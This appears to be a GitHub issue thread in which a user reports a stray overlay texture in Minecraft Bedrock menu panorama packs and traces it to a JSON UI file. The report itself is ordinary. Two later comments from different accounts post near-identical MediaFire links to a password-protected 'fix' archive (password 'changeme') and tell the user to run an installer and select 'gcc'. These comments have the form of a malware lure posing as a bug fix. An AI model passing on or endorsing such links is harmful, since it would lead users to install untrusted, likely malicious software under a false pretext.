### ISSUE TITLE
[GUI/Menu Panoramas] Many Packs

### ISSUE THREAD

**Issue by PAPISOP** [BedrockTweaks/Files#299]
**Pack or combination of packs which has the bug** Many Packs

**Describe the bug**
There is a weird texture in the middle of the panorama in many packs

**Screenshots**
Bees
![image](https://github.com/user-attachments/assets/0d3841f5-b7bc-4f9e-8d8c-aa7ab11060df)

Village
![image](https://github.com/user-attachments/assets/80f3521e-ede9-44b1-9389-692b4ab4bbb5)

etc

**Device (please complete the following information):**
 - OS: Windows 11
 - Minecraft Version: 1.21.22

**Additional context**
The texture in the middle is actually `panorama_overlay.png` texture and it is caused by the JSON UI in the pack, and when i remove the JSON UI file itself from the pack then it fixes it, but why is there a JSON UI in the first place? and all the menu panorama packs have this exact JSON UI

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
